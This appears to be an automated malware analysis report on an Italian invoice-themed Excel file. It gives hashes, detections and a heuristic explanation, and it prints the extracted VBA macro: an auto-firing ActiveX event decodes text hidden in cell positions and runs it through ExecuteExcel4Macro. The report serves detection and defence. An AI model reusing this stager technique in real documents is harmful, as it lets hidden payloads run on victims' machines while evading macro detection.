Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 21861dfd5dc09356…

MALICIOUS

Office (OOXML)

37.3 KB Created: 2020-07-07 07:10:18 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-07-24
MD5: e3f0a053c8ca4394c5352d41627b0a67 SHA-1: 0ad720a9b870e87d5238c57f4bd1fb86dc4d3435 SHA-256: 21861dfd5dc09356971994ea642e9f3dc7afe1319b2d41ac19317c85ac5d5087
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains VBA macros that leverage an ActiveX event to trigger decoded Excel 4.0 macros. This mechanism is used to execute arbitrary code, as indicated by the critical heuristic firings and ClamAV detection. The script's logic suggests it attempts to deobfuscate and execute a payload, likely leading to further compromise.

Heuristics 3

  • ClamAV: Xls.Malware.Mrhl-9774585-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Mrhl-9774585-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1090 bytes
SHA-256: e1825a887914c3237f9af1f08ed545a80e47a3edd794594de617e59ad644dbe3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "fattura, 6, 0, MSForms, Frame"
Sub visualizza()
Application.Dialogs(xlDialogPrint).Show: Application.WindowState = xlMinimized: ActiveWorkbook.Close 0
End Sub
Private Sub fattura_Layout()
For Each cr In ActiveSheet.UsedRange.SpecialCells(xlCellTypeVisible)
If cr.NumberFormat = 0 Then
copia = Chr(cr.Column)
If cr.Column <> 107 Then
copia1 = copia1 + copia
Else
ExecuteExcel4Macro (copia1)
copia1 = ""
End If
End If
Next
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 10752 bytes
SHA-256: 8caffc9ee390c15a740aca2955397d7116ebb7314412793e68a90287ea65dd46
Detection
ClamAV: Xls.Malware.Mrhl-9774585-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 2392 bytes
SHA-256: e541d72a55bf9f812d74dc173bef2d17937fdc9d850cbf999ccf24f5cb5a6933

Open this report in the interactive analyzer, or submit your own file for analysis.